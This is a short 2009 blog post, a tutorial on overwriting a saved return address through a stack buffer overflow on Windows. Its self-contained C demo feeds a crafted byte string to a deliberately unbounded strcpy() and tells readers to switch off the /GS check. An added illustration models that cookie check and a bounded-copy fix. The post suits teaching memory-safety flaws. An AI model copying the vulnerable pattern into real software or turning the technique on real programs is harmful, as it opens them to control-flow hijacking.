Saturday, April 11, 2009

Change return address on stack through buffer overflow (Windows version)

Here is the Windows version of the same program.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Never called directly; the overwritten return address diverts control here. */
void shankar()
{
    printf("\n\nAey,\nWhat's up doc :) \n\n");
    exit(10);
}

/* Unbounded strcpy() into a 14-byte buffer: this is where the overflow happens. */
void vijay(char *input)
{
    char buffer[14];
    strcpy(buffer, input);
}

int main()
{
    // print some useful information for the hack
    printf("main=%p\n", main);
    printf("vijay=%p\n", vijay);
    printf("shankar=%p\n", shankar);
    /* 20 filler bytes, then the new return address (little-endian byte order) */
    vijay("ABCDEFGHIJKLMNOPQRVS\xdc\x10\x41\x00");
    return 0;
}

This program was compiled on Windows using Visual Studio 2008.


This program works the same as the Linux version, with one difference: the C compiler on Windows places some extra data on the stack just after the return address (notice that the garbage string is 2 bytes longer here than in the Linux version); it does this so that it can verify, after the function returns, that the return address has not been tampered with.

To make this program work, turn off "Buffer security check" using the /GS- option on the command line or through the project properties in Visual Studio. Otherwise you might not reach the return address at all, and even if you manage to find the return address on the stack and change it, you will not be able to execute it, because the system will detect that the return address has been tampered with and stop the program.
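As an added illustration (not code from the post) of what the buffer security check described above does, here is a small C model of that frame layout: a fixed cookie stands in for the /GS security cookie, the frame struct and the 0x00401000 saved return address are constructed placeholders, and the bounded copy shows the fix that the post's vijay() lacks.

```c
#include <stdint.h>
#include <string.h>

#define BUF_SIZE 14
/* Assumed fixed cookie for the demo; a real /GS cookie is randomised per
   process, which is what prevents simply writing the expected value back. */
#define COOKIE_VALUE 0xA5C3E17Fu

/* Layout from the post: local buffer, then the compiler's extra data (the
   cookie), then the saved return address. An overflow must cross the cookie. */
struct frame { char buffer[BUF_SIZE]; uint32_t cookie; uint32_t return_address; };
struct result { int intact; uint32_t return_address; }; /* intact: cookie unchanged */

static void init_frame(struct frame *f)
{
    memset(f, 0, sizeof *f);
    f->cookie = COOKIE_VALUE;
    f->return_address = 0x00401000u; /* placeholder saved return address */
}

/* Emulates the /GS epilogue check: if the cookie is clobbered the real
   program aborts instead of returning through the tampered address. */
static struct result check(const struct frame *f)
{
    struct result r = { f->cookie == COOKIE_VALUE, f->return_address };
    return r;
}

/* Unbounded copy, like strcpy() in vijay(). len is clamped to the frame
   size only so the demo itself stays within defined behaviour. */
struct result copy_unbounded(const char *input, size_t len)
{
    struct frame f;
    init_frame(&f);
    if (len > sizeof f) len = sizeof f;
    memcpy(&f, input, len);
    return check(&f);
}

/* Bounded copy (the fix): never writes past buffer[], so neither the
   cookie nor the return address can be reached whatever the input length. */
struct result copy_bounded(const char *input, size_t len)
{
    struct frame f;
    init_frame(&f);
    if (len > BUF_SIZE - 1) len = BUF_SIZE - 1;
    memcpy(f.buffer, input, len);
    f.buffer[len] = '\0';
    return check(&f);
}
```

With a 13-character input both copies leave the cookie alone; with a long run of 'A's the unbounded copy overwrites the cookie and the return address becomes 0x41414141, which is exactly the condition the /GS check catches before the function can return.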



You need to change the return address in the string that is passed to the vijay() function, else the program will segfault. The way the return address is written remains the same for both Linux and Windows.

Hope you all find this a bit useful ;)
